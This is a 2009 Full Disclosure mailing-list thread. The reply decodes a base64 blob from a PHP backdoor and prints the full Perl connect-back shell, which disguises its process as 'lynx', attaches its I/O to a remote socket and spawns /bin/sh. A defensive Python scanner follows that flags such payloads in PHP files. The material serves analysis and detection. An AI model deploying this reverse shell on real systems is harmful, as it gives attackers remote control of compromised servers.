Full Disclosure mailing list archives
Re: connect back PHP hack
From: Augusto Pereyra <aepereyra () gmail com>
Date: Tue, 10 Feb 2009 23:37:45 -0300
This is encoded in base64. If you decode it you will see the next program:

#!/usr/bin/perl
use Socket;
$cmd = "lynx";
$system = 'echo "`uname -a`";echo "`id`";/bin/sh';
$0 = $cmd;                        # process shows up as "lynx" in ps
$target = $ARGV[0];               # host to connect back to
$port = $ARGV[1];                 # port to connect back to
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");          # tie stdin/stdout/stderr to the socket
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);                  # print uname/id, then hand over /bin/sh
close(STDIN);
close(STDOUT);
close(STDERR);

If you want to do it yourself, visit http://www.motobit.com/util/base64-decoder-encoder.asp, paste the base64 code and you will see the light.

Cool!!!!

Best regards,
Augusto Pereyra

On Tue, Feb 10, 2009 at 3:23 PM, sr. <staticrez () gmail com> wrote:

Can anyone tell me what encoding this is?

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

This has to do with an old PHP 4.x.x version with magic quotes enabled. I'm just trying to figure out what the connect back code does. Any input is much appreciated.

Thx,
sr.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
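For anyone triaging a compromised PHP host rather than decoding by hand, here is an added example (not from the thread or any poster) of a small scanner that pulls base64 literals out of PHP source, decodes them even when an archive or mail client has wrapped them, and flags the ones that carry the connect-back pattern shown above. The indicator regexes and the sample PHP fragment are constructed for this example.

```python
import base64
import re
from typing import Optional

# Indicators that a decoded blob is a Perl connect-back payload of the kind
# shown in the thread: Socket loaded, a TCP connect, the standard fds dup'ed
# onto the socket, and a shell spawned. Two or more together is a strong signal.
INDICATORS = {
    "perl_socket": re.compile(r"\buse\s+Socket\b"),
    "tcp_connect": re.compile(r"\bconnect\s*\(\s*SOCKET\b"),
    "fd_to_socket": re.compile(r"open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*[\"']>&SOCKET"),
    "spawn_shell": re.compile(r"/bin/(?:ba)?sh\b"),
    "recon_cmds": re.compile(r"uname\s+-a|\bid\b"),
}

# A base64 literal assigned to a PHP variable. Whitespace is tolerated inside
# the literal because list archives wrap long lines, as happened on this page.
B64_ASSIGN = re.compile(r"\$(\w+)\s*=\s*[\"']([A-Za-z0-9+/=\s]{40,})[\"']")

def decode_blob(blob: str) -> Optional[str]:
    """Drop wrapping whitespace and base64-decode; None if it is not valid base64."""
    compact = re.sub(r"\s+", "", blob)
    try:
        raw = base64.b64decode(compact, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("latin-1")

def scan_php_source(src: str) -> list:
    """One finding per base64 variable whose decoded content matches >= 2 indicators."""
    findings = []
    for var, blob in B64_ASSIGN.findall(src):
        decoded = decode_blob(blob)
        if decoded is None:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if len(hits) >= 2:
            first = decoded.splitlines()[0] if decoded else ""
            findings.append({"variable": var, "indicators": hits, "preview": first})
    return findings

# Constructed sample, not the blob from the thread: a PHP fragment carrying a
# base64 Perl stub with the tell-tale calls, wrapped at 60 columns, plus a
# harmless base64 string that must not be flagged.
_STUB = ("#!/usr/bin/perl\nuse Socket;\nconnect(SOCKET, $paddr);\n"
         'open(STDIN, ">&SOCKET");\nsystem("/bin/sh");\n')
_B64 = base64.b64encode(_STUB.encode()).decode()
SAMPLE_PHP = ('<?php\n$back_connect="' + "\n".join(_B64[i:i + 60] for i in range(0, len(_B64), 60))
              + '";\n$banner="' + base64.b64encode(b"Welcome to the site, enjoy your stay here!").decode()
              + '";\n?>')

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_PHP):
        print(f"${f['variable']}: {', '.join(f['indicators'])} ({f['preview']})")
```

Run it over every `.php` file under the web root; a hit on a variable like `$back_connect` is the cue to pull the file, check the web server logs for the request that created it, and look for an outbound TCP connection from the web server user.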